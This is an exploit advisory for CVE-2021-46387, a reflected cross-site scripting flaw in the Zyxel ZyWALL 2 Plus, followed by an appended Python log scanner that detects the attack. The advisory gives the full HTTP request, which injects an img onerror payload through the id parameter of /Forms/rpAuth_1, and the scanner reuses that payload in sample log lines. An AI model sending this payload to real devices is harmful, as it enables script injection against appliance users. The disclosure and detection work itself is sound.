Zyxel ZyWALL 2 Plus Cross Site Scripting
- Authored by Momen Eldawakhly

Zyxel ZyWALL 2 Plus suffers from a cross site scripting vulnerability.
- advisories | CVE-2021-46387
- MD5 | fd4b0dad3ba6f24a0a04bfd6719dc3ee

# Exploit Title: Zyxel ZyWALL 2 Plus Internet Security Appliance - Cross-Site Scripting (XSS)
# Date: 1/3/2022
# Exploit Author: Momen Eldawakhly (CyberGuy)
# Vendor Homepage: https://www.zyxel.com
# Version: ZyWALL 2 Plus
# Tested on: Ubuntu Linux [Firefox]
# CVE : CVE-2021-46387
GET /Forms/rpAuth_1?id=%3C/form%3E%3CiMg%20src=x%20onerror=%22prompt(1)%22%3E%3Cform%3E HTTP/1.1
Host: vuln.ip:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
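
A defensive check for the request above, as an added example that is not part of the original advisory: it scans access-log lines for `/Forms/rpAuth_1` requests whose decoded `id` parameter carries HTML markup. The combined log format, the assumption that a proxy or gateway in front of the management interface writes such logs, and the sample lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Path and parameter come from the advisory's request line.
TARGET_PATH, TARGET_PARAM = "/Forms/rpAuth_1", "id"
# Characters or event-handler attributes that let a reflected value break out of HTML.
MARKUP = re.compile(r"[<>\"']|\bon\w+\s*=", re.IGNORECASE)
# Request line of a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines; the first reuses the request shown in the advisory.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Mar/2022:09:14:02 +0000] "GET /Forms/rpAuth_1?id=%3C/form%3E%3CiMg%20src=x%20onerror=%22prompt(1)%22%3E%3Cform%3E HTTP/1.1" 200 1843',
    '198.51.100.9 - - [01/Mar/2022:09:15:40 +0000] "GET /Forms/rpAuth_1?id=1 HTTP/1.1" 200 1790',
    '198.51.100.9 - - [01/Mar/2022:09:16:11 +0000] "GET /index.html?id=%3Cb%3E HTTP/1.1" 404 312',
]


def fully_decode(value, rounds=3):
    """Percent-decode repeatedly (bounded) so nested encoding is normalised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_id(log_line):
    """Return the decoded `id` value if the line matches the advisory's pattern, else None."""
    match = REQUEST.search(log_line)
    if not match:
        return None
    try:
        url = urlsplit(match.group(1))
    except ValueError:  # malformed request target
        return None
    if url.path != TARGET_PATH:
        return None
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        value = fully_decode(value)
        if name == TARGET_PARAM and MARKUP.search(value):
            return value
    return None


def scan(lines):
    """Return (line_number, decoded_value) for every flagged line."""
    return [(n, v) for n, line in enumerate(lines, 1) if (v := suspicious_id(line))]
```
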


